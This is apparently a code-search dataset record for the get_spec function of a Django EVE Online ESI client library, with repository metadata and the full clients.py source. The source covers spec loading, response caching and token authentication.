Trims down a source spec dict to only the operations or resources indicated.
:param spec_dict: The source spec dict to minimize.
:type spec_dict: dict
:param operations: A list of opertion IDs to retain.
:type operations: list of str
:param resources: A list of resource names to retain.
:type resources: list of str
:return: Minimized swagger spec dict
:rtype: dict
"""
operations = operations or []
resources = resources or []
# keep the ugly overhead for now but only add paths we need
minimized = {key: value for key, value in spec_dict.items() if key != 'paths'}
minimized['paths'] = {}
for path_name, path in spec_dict['paths'].items():
for method, data in path.items():
if data['operationId'] in operations or any(tag in resources for tag in data['tags']):
if path_name not in minimized['paths']:
minimized['paths'][path_name] = {}
minimized['paths'][path_name][method] = data
return minimized
|
Adarnof/adarnauth-esi | esi/clients.py | get_spec | python | def get_spec(name, http_client=None, config=None):
http_client = http_client or requests_client.RequestsClient()
def load_spec():
loader = Loader(http_client)
return loader.load_spec(build_spec_url(name))
spec_dict = cache.get_or_set(build_cache_name(name), load_spec, app_settings.ESI_SPEC_CACHE_DURATION)
config = dict(CONFIG_DEFAULTS, **(config or {}))
return Spec.from_dict(spec_dict, build_spec_url(name), http_client, config) | :param name: Name of the revision of spec, eg latest or v4
:param http_client: Requests client used for retrieving specs
:param config: Spec configuration - see Spec.CONFIG_DEFAULTS
:return: :class:`bravado_core.spec.Spec` | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/clients.py#L142-L157 | [
"def build_cache_name(name):\n \"\"\"\n Cache key name formatter\n :param name: Name of the spec dict to cache, usually version\n :return: String name for cache key\n :rtype: str\n \"\"\"\n return 'esi_swaggerspec_%s' % name\n",
"def build_spec_url(spec_version):\n \"\"\"\n Generates th... | from __future__ import unicode_literals
from bravado.client import SwaggerClient, CONFIG_DEFAULTS
from bravado import requests_client
from bravado.swagger_model import Loader
from bravado.http_future import HttpFuture
from bravado_core.spec import Spec
from esi.errors import TokenExpiredError
from esi import app_settings
from django.core.cache import cache
from datetime import datetime
from hashlib import md5
import json
try:
import urlparse
except ImportError: # py3
from urllib import parse as urlparse
SPEC_CONFIG = {'use_models': False}
class CachingHttpFuture(HttpFuture):
"""
Used to add caching to certain HTTP requests according to "Expires" header
"""
def __init__(self, *args, **kwargs):
super(CachingHttpFuture, self).__init__(*args, **kwargs)
self.cache_key = self._build_cache_key(self.future.request)
@staticmethod
def _build_cache_key(request):
"""
Generated the key name used to cache responses
:param request: request used to retrieve API response
:return: formatted cache name
"""
str_hash = md5(
(request.method + request.url + str(request.params) + str(request.data) + str(request.json)).encode(
'utf-8')).hexdigest()
return 'esi_%s' % str_hash
@staticmethod
def _time_to_expiry(expires):
"""
Determines the seconds until a HTTP header "Expires" timestamp
:param expires: HTTP response "Expires" header
:return: seconds until "Expires" time
"""
try:
expires_dt = datetime.strptime(str(expires), '%a, %d %b %Y %H:%M:%S %Z')
delta = expires_dt - datetime.utcnow()
return delta.seconds
except ValueError:
return 0
def result(self, **kwargs):
if app_settings.ESI_CACHE_RESPONSE and self.future.request.method == 'GET' and self.operation is not None:
"""
Only cache if all are true:
- settings dictate caching
- it's a http get request
- it's to a swagger api endpoint
"""
cached = cache.get(self.cache_key)
if cached:
result, response = cached
else:
_also_return_response = self.also_return_response # preserve original value
self.also_return_response = True # override to always get the raw response for expiry header
result, response = super(CachingHttpFuture, self).result(**kwargs)
self.also_return_response = _also_return_response # restore original value
if 'Expires' in response.headers:
expires = self._time_to_expiry(response.headers['Expires'])
if expires > 0:
cache.set(self.cache_key, (result, response), expires)
if self.also_return_response:
return result, response
else:
return result
else:
return super(CachingHttpFuture, self).result(**kwargs)
requests_client.HttpFuture = CachingHttpFuture
class TokenAuthenticator(requests_client.Authenticator):
"""
Adds the authorization header containing access token, if specified.
Sets ESI datasource to tranquility or singularity.
"""
def __init__(self, token=None, datasource=None):
host = urlparse.urlsplit(app_settings.ESI_API_URL).hostname
super(TokenAuthenticator, self).__init__(host)
self.token = token
self.datasource = datasource
def apply(self, request):
if self.token and self.token.expired:
if self.token.can_refresh:
self.token.refresh()
else:
raise TokenExpiredError()
request.headers['Authorization'] = 'Bearer ' + self.token.access_token if self.token else None
request.params['datasource'] = self.datasource or app_settings.ESI_API_DATASOURCE
return request
def build_cache_name(name):
"""
Cache key name formatter
:param name: Name of the spec dict to cache, usually version
:return: String name for cache key
:rtype: str
"""
return 'esi_swaggerspec_%s' % name
def cache_spec(name, spec):
"""
Cache the spec dict
:param name: Version name
:param spec: Spec dict
:return: True if cached
"""
return cache.set(build_cache_name(name), spec, app_settings.ESI_SPEC_CACHE_DURATION)
def build_spec_url(spec_version):
"""
Generates the URL to swagger.json for the ESI version
:param spec_version: Name of the swagger spec version, like latest or v4
:return: URL to swagger.json for the requested spec version
"""
return urlparse.urljoin(app_settings.ESI_API_URL, spec_version + '/swagger.json')
def build_spec(base_version, http_client=None, **kwargs):
"""
Generates the Spec used to initialize a SwaggerClient, supporting mixed resource versions
:param http_client: :class:`bravado.requests_client.RequestsClient`
:param base_version: Version to base the spec on. Any resource without an explicit version will be this.
:param kwargs: Explicit resource versions, by name (eg Character='v4')
:return: :class:`bravado_core.spec.Spec`
"""
base_spec = get_spec(base_version, http_client=http_client, config=SPEC_CONFIG)
if kwargs:
for resource, resource_version in kwargs.items():
versioned_spec = get_spec(resource_version, http_client=http_client, config=SPEC_CONFIG)
try:
spec_resource = versioned_spec.resources[resource.capitalize()]
except KeyError:
raise AttributeError(
'Resource {0} not found on API revision {1}'.format(resource, resource_version))
base_spec.resources[resource.capitalize()] = spec_resource
return base_spec
def read_spec(path, http_client=None):
"""
Reads in a swagger spec file used to initialize a SwaggerClient
:param path: String path to local swagger spec file.
:param http_client: :class:`bravado.requests_client.RequestsClient`
:return: :class:`bravado_core.spec.Spec`
"""
with open(path, 'r') as f:
spec_dict = json.loads(f.read())
return SwaggerClient.from_spec(spec_dict, http_client=http_client, config=SPEC_CONFIG)
def esi_client_factory(token=None, datasource=None, spec_file=None, version=None, **kwargs):
"""
Generates an ESI client.
:param token: :class:`esi.Token` used to access authenticated endpoints.
:param datasource: Name of the ESI datasource to access.
:param spec_file: Absolute path to a swagger spec file to load.
:param version: Base ESI API version. Accepted values are 'legacy', 'latest', 'dev', or 'vX' where X is a number.
:param kwargs: Explicit resource versions to build, in the form Character='v4'. Same values accepted as version.
:return: :class:`bravado.client.SwaggerClient`
If a spec_file is specified, specific versioning is not available. Meaning the version and resource version kwargs
are ignored in favour of the versions available in the spec_file.
"""
client = requests_client.RequestsClient()
if token or datasource:
client.authenticator = TokenAuthenticator(token=token, datasource=datasource)
api_version = version or app_settings.ESI_API_VERSION
if spec_file:
return read_spec(spec_file, http_client=client)
else:
spec = build_spec(api_version, http_client=client, **kwargs)
return SwaggerClient(spec)
def minimize_spec(spec_dict, operations=None, resources=None):
"""
Trims down a source spec dict to only the operations or resources indicated.
:param spec_dict: The source spec dict to minimize.
:type spec_dict: dict
:param operations: A list of opertion IDs to retain.
:type operations: list of str
:param resources: A list of resource names to retain.
:type resources: list of str
:return: Minimized swagger spec dict
:rtype: dict
"""
operations = operations or []
resources = resources or []
# keep the ugly overhead for now but only add paths we need
minimized = {key: value for key, value in spec_dict.items() if key != 'paths'}
minimized['paths'] = {}
for path_name, path in spec_dict['paths'].items():
for method, data in path.items():
if data['operationId'] in operations or any(tag in resources for tag in data['tags']):
if path_name not in minimized['paths']:
minimized['paths'][path_name] = {}
minimized['paths'][path_name][method] = data
return minimized
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.